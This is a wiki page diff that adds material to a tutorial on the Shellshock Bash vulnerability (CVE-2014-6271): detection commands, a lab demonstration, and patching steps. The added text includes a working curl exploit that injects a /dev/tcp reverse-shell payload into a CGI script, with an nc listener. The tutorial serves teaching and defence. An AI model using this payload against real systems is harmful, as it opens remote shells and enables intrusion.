Differences

This shows you the differences between two versions of the page.

--- bash:shellshock [2016/07/03 17:52] – peter
+++ bash:shellshock [2020/07/15 09:30] (current) – external edit 127.0.0.1
@@ Line 1: / Line 1: @@
-====== Bash - Shellshock ======
+====== BASH - Shellshock ======
 The Shellshock bug allows someone to remotely execute arbitrary code on systems that uses Bash.
@@ Line 6: / Line 6: @@
 The Bash flaw – designated CVE-2014-6271 [http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271] – is being exploited in the wild against web servers, which are the most obvious targets but not by any means the only machines at risk.
+----
 ===== Main Reason =====
@@ Line 17: / Line 19: @@
 Whether these computers are actually vulnerable depends on whether they invoke Bash in an unsafe way.  We already know that this is true of many web servers, and it’s believed that other types of network services could also be vulnerable. But it’ll take a while for security experts to audit various pieces of software to check for vulnerabilities.
+----
 ===== Finding the Bug =====
@@ Line 26: / Line 29: @@
 </code>
+or
+<code bash>
+env 'VAR=() { :;}; echo vulnerable!' 'FUNCTION()=() { :;}; echo vulnerable!' bash -c "echo hello"
+</code>
 If you are vulnerable it will return:
@@ Line 39: / Line 48: @@
 </code>
+----
 ===== Remote Code Execution Through Bash =====
@@ Line 78: / Line 87: @@
 ls -l /tmp/tmpoutput
 </code>
+So you have a cgi file named “bashbug” that does nothing but respond with “CGI bug found”.  If you call it using curl with a malicious user agent header, bash stores that header in an environment variable, but due to the bug, the code gets executed which creates the file “/tmp/tmpoutput”.
+----
+==== Example 2:  Getting a reverse tcp connection from target system using /dev/tcp connection. ====
+In this example I had two machines, one is  Kali Linux  – 192.168.31.20  and  Ubuntu 14.04  – 192.168.31.5 ( Shellshock ).
+From my Kali Linux machine i executed the remote command on the target Ubuntu system to create a TCP connection on port 4444 and then listen on port 4444 in my local machine using netcat.
+<code>
+root@kali# nc -lvp 4444
+root@kali#  curl  -H  ‘x: () { :;};  /bin/bash  -i  >&  /dev/tcp/192.168.31.20/4444  0>&1’   http://192.168.31.5/cgi-bin/bashbug.sh
+</code>
+That’s it we successfully got the reverse connection of www-data user from the bash vulnerable system.
+----
+===== Test Remote Sites =====
+If you simply want to test if websites or specific CGI scripts are vulnerable, use this link:
+http://shellshock.brandonpotter.com/
+----
+===== Fix the Vulnerability =====
+The easiest way to fix the vulnerability is to use your default package manager to update the version of Bash.
+<code bash>
+sudo apt-get update && sudo apt-get install --only-upgrade bash
+</code>
+----
+===== End of Life Ubuntu / Debian Releases =====
+If you are running a release of Ubuntu / Debian that is considered end of life status, you will have to upgrade to a supported to use the package manager to update Bash.  The following command can be used to upgrade to a new release (it is recommended that you back up your server and important data first, in case you run into any issues):
+<code bash>
+sudo do-release-upgrade
+</code>
+After the upgrade is complete, ensure that you update Bash.